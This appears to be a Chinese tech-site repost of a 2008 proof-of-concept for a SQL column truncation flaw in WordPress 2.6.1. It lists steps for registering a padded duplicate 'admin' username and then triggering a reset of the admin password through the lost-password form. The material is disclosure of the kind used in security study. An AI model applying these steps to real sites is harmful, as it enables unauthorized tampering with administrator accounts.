当前位置: 代码网 > 服务器>网络安全>漏洞分析 > WordPress 2.6.1 SQL Column Truncation Vulnerability分析

WordPress 2.6.1 SQL Column Truncation Vulnerability分析

2008年10月08日 漏洞分析 我要评论
WordPress 2.6.1 SQL Column Truncation Vulnerability分析 用wordpress的要注意了,不过拿我这里测试就没效果了,我从一开始就是关闭用户注册的。# WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC)## found by irk4z[a... 08-10-08
用wordpress的要注意了,不过拿我这里测试就没效果了,我从一开始就是关闭用户注册的。 # wordpress 2.6.1 sql column truncation vulnerability (poc)
#
# found by irk4z[at]yahoo.pl
# homepage: http://irk4z.wordpress.com/
#
# this is not critical vuln [;
#
# first, read this discovery:
# http://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/
#
# in this hack we can remote change admin password, if registration enabled
#
# greets: stefan esser, lukasz pilorz, condemned, tbh, sid.psycho, str0ke and all fiends 1. go to url: server.com/wp-login.php?action=register 2. register as: login: admin x
email: your email^ admin[55 space chars]x now, we have duplicated 'admin' account in database 3. go to url: server.com/wp-login.php?action=lostpassword 4. write your email into field and submit this form 5. check your email and go to reset confirmation link 6. admin's password changed, but new password will be send to correct admin email ;/ # milw0rm.com
(0)

相关文章:

版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。

发表评论

验证码:
Copyright © 2017-2025  代码网 保留所有权利. 粤ICP备2024248653号
站长QQ:2386932994 | 联系邮箱:2386932994@qq.com